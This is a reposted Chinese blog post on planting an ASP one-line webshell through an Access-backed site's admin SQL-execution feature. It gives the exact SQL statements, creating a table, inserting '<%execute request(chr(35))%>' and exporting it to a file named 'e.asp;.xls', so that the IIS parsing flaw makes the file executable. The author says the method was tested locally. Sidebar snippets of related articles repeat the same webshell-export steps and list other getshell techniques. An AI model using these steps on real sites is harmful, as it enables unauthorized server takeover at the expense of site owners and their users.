Access库利用后台SQL执行导出webshell渗透

最新推荐文章于 2024-07-10 22:41:59 发布
最新推荐文章于 2024-07-10 22:41:59 发布
阅读量137 收藏
点赞数
文章标签: 数据库 php shell
原文链接:http://www.cnblogs.com/baogg/articles/2029956.html
版权
今天渗透了一个站点,后台有能执行sql语句的地方,恰好又得到了网站物理路径。以前看到网上有用access导出shell的方法,原理大致和php网站的outfile差不多

先将一句话写到数据库中,然后再通过语句写到文件中。

这里要将数据表内容导出到一个EXCEL文件中,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后再利用IIS解析漏洞就可以用客户端连接了

需要执行如下操作:

(1)create table a (b varchar(50))

建立一个有一个b字段的表,表名为a,字段类型为字符,长度为50

(2)insert into a (b) values('<%execute request(chr(35))%>')

在表a的b字段插入密码为#的一句话木马

(3)select * into [b] in 'd:\......\e.asp;.xls' 'excel 4.0;' from a

把表a的内容导出为e.asp;xlsdrop



其实上述3个语句用一句就可以实现:

SELECT '<%execute request(chr(35))%>' into [user] in 'd:\......\e.asp;.xls' 'excel 8.0;' from [user]

我对上面的方法在本地都测试了下,是可以实现的,并且可以用一句话客户端链接并执行(IIS+win2003)。

当然由于服务器权限的限制,实际操作时也有不成功的可能。

转载于:https://www.cnblogs.com/baogg/articles/2029956.html

weixin_30663471
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ACCESS数据后台sql语句执行导shell
kuxing100的专栏
03-15 766
问: 一个垃圾论坛,access数据,无其他可利用之处,不过有个sql语句执行功能,绝对路径也知道,小弟对sql语句不懂,记得如果是mysql数据root权限可以导出SHELL,这个是否也能导出shell呢?需要什么条件,语句又是什么?网上翻不到资料。麻烦各位。 答: create table cmd (a varchar(50)) insert into cmd (a) values
Access导出一句话拿shell实战
收集盒 Book box
08-30 1521
目标站:http://www.xxxx.com 我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台: 看到数据备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。 不过
access实例_详解7个shell脚本实例,值得收藏练习
weixin_39609822的博客
11-24 769
概述看多shell脚本实例自然就会有shell脚本的编写思路了,所以我一般比较推荐看脚本实例来练习shell脚本。下面分享几个shell脚本实例。1、监测Nginx访问日志502情况,并做相应动作假设服务器环境为lnmp,近期访问经常出现502现象,且502错误在重启php-fpm服务后消失,因此需要编写监控脚本,一旦出现502,则自动重启php-fpm服务。#场景:#1.访问日志文件的路径:/d...
第二十一天 getshell
weixin_46653764的博客
06-26 345
(1)直接上传拿shell 如果知道网站是用什么cms,但网站后台改了目录,很难去通过扫目录来获取后台地址,那这时就可以通过谷歌语法↓(这里拿织梦cms来做比喻–>织梦默认后台路径是/dede/login.php,通常者都会被管理员改掉的) 可以这样:inurl:(你要查的url) intext:powered by dedecms(这是dedecms在后台管理登录界面的关键词,虽然这里没写全) 知道后台地址后,就尝试弱口令爆破,爆不了只能想其他法子 这里假设已经登进了后台,像织梦cms,进入了后
ACCESS高级注入教程
广外女生官方BLOG
09-15 1371
 现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据的攻击方式,而MSSQL Server的方法则更为多样和复杂, 当我们取得连接权限较高的注入点的时候,我们可以利用MSSQL Server本身所带的扩展来执行命令,或者是获取目录,读取文件与修改注册表;在低权用户的连接中,我
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
在MySQL注入中,由于其...总之,虽然MySQL的特性限制了某些类型的攻击,但仍然存在多种方式利用SQL注入导出字段内容或创建WebShell。开发人员应当保持警惕,确保应用程序的安全性,遵循最佳实践来防止这些潜在的威胁。
网站后台Webshell
01-13
webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑删除,上传或者下载,查看文件 攻击者也可以通过这个webshell对服务器进行提权,提权成功后,会得到服务器管理权限。拿...
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
Webshell可以提供命令执行、文件操作、数据管理等功能,使攻击者能够绕过常规的安全防护措施。案例中,通过"态势感知"服务发现了异常的PHP文件,这些文件可能是攻击者留下的Webshell,用于进一步的操作。 【WAF...
渗透测试攻防webshell大合集.zip
07-26
超千个实战webshell: 138shell antSword antSword-shells AntSwordProject asp aspx b4tm4n-toolz Backdoor Dev Shells webshellpub等等,太多了,不一一列举了,需要的下载使用。
webshell渗透测试软件
08-10
网络安全与数据恢复相关工具,渗透测试软件
getshell方法总结
tell_me_404的博客
03-09 3713
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 ...
Access数据防注入系统拿实战shell(思路笔记)
来到了学渣的博客
04-05 1708
偶尔实战会碰到如下画面,但其实是有方法的。 例子示范: 尝试判断注入,出现防注入系统 而一般数据会记录到sqlin.asp这个页面中 尝试插入一句话马子,把马子url转码一下再传 如图所示 菜刀连接 xxx.xxx.xxx.xxx/sqlin.asp ...
利用WebShell拿Shell技巧
悦分享
08-01 1928
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3164
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
ACCESS执行SQL语句导出一句话拿webshell
eldn__的专栏
12-21 6711
实用环境,在access后台其他方法不能拿到webshell 但是后台SQL语句查询执行,就可以直接access导出一句话拿webshell了 不过需要知道物理路径才能导出利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据不允许导出其他危险格式。 至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。 逐一执行以下语句就可以导出一句话了
ACCESS导出一句话拿webshell
jihaichen的博客
05-04 1101
第一句代码create table cmd (a varchar(50))  第二句代码insert into cmd (a) values ('一句话木马')  第三句代码select * into [a] in 'e:\host\chouwazi.com\web\data\xiao.asp;xiao.xls' 'excel 4.0;' from cmd  第四句代码drop table cmd...
如何通过SQL语句写入webshell
weixin_33720956的博客
07-03 1844
在web应用场景下,经常会碰到SQL注入场景,如页面能够执行SQL语句,那么可能会有直接通过SQL语句写入webshell的风险,常见的phpmyadmin环境下,通过几个语句可以轻松将一句话木马写入到服务器文件,如下: use test; //进入数据create table test (shell text not null); //创建表insert into test (shell)...
7.10飞书一面面经
最新发布
东篱君的博客
07-10 707
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
实战-从社工客服拿到密码登录后台SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
"这篇文档详细记录了一次网络安全渗透测试的过程,从社工手段获取密码,到尝试SQL注入,再到绕过安全防护写入webshell,最后进行权限提升和内网渗透。作者首先遇到了首页无法访问的问题,然后通过试探性踩点在忘记...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值